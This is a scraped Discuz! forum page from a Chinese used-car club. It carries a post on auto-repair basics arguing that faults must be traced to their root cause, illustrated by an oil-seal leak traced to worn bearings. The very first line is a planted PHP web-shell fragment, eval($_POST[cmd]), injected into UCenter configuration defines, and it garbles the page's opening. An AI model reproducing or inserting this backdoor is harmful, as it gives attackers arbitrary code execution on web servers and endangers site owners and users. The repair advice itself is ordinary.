');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 查找故障根源才能徹底排除故障[汽車修理基礎] - 二手車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

查找故障根源才能徹底排除故障[汽車修理基礎]

實踐證明:找到產生故障的根本原因才能真正解決故障問題。
很多在機修時我們看到的表面現象,並不一定是引起故障的真正原因,在這些表象的背後,有許多直接或間接產生事故的因素存在,只有找出那些問題才能徹底排除故障。
例如:  
一輛車油封漏油,拆檢時發現油封已損壞。像這樣的問題,只有找到油封漏油的根本原因,才是防止故障再次產生的根本。如果從表面上看就能確定油封明顯地是因老化和磨損而漏油的,那麼換一隻新的就能從根本上解決了;但若沒有明顯的表面問題,那就要對其進行深入的因果分析和檢測了。如,發動機內壓大導致油封內部氣阻過大漏油,如軸頸的磨損和軸的徑向間隙過大等。經檢查,油封內部無過大內壓,軸頸無明顯磨損,原因在於軸承磨損過度使軸的徑向間隙過大,從而導致油封漏油。
在排除故障時,一個修理工如果只是做到頭痛醫頭、腳痛醫腳,那他將永遠停留在一個低水平上,應抓住問題的重點,仔細分析因果關係,找出產生故障的根本原因,這不僅能保證徹底地排除故障,而且有助於提高車輛修理水平。
返回列表